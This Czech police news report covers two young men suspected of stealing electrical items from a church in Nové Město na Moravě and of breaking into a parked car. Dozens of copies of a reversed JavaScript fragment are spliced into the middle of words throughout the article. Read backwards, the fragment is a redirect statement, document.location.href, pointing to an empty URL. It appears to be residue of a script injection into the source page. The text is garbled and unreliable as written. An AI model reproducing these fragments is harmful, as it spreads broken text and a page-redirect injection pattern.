Rainbow page separator

Mladíci kradli v kostele, jeden z nich se vloupal i do auta

Čtvrtek, 14. listopadu 2019

Policie České republiky

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Původce srpnového vloupání do kostela i zaparkovaného auta se podařilo dopadnout novoměstským policistům ve spolupráci s kriminalisty. Podezřelými jsou dva mladí muži, kteří již byli v minulosti soudně trestáni. Případ je řešen ve zkráceném přípravném řízení.
„Muži z Opavska ve věku jednadvacet a dvacet let jsou podezřelí z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že se ve čtvrtek 29. srpna ve večerních hodinách společně vloupali do kostelíku v Novém Městě na Moravě, kde odcizili mimo jiné elektrický přímo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];top, vysavač, ventilá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor a prodlužovací kabely. Škoda byla vyčíslena na částku kolem pěti tisíc korun. Dvacetiletý muž je dále podezřelý ještě z vloupání do zaparkovaného vozidla, ke kterému došlo pátek 30. srpna odpoledne na odstavné ploše u koupaliště. Po rozbití jednoho z oken z auta odcizil ba[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toh s různými věcmi včetně mobilního telefonu a peněženky, ve které byla ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost, doklady a platební karty. Celková škoda byla vyčíslena na zhruba osm tisíc korun,“ informovala policejní mluvčí Stanislava Miláčková.
„Policejní inspek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor sdělil oběma mužům podezření ze spáchání přečinu krádeže ve spolupachatelství. Dvacetiletému muži navíc sdělil podezření ze spáchání přečinů krádeže a neoprávněného opatření, padělání a pozměnění platebního prostředku,“ upřesnil vedoucí obvodního policejního oddělení Stanislav Sochor.
Oba podezřelí již byli za majetkovou trestnou činnost trestáni. „Jednadvacetiletý muž byl le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos odsouzen k podmíněnému trestu odnětí svobody a dvacetiletý si již odpykal nepodmíněný trest odnětí svobody v délce sedmi měsíců, ze kterého se vrátil v březnu,“ doplnila mluvčí. Oběma mladíkům nyní hrozí až tříletý trest.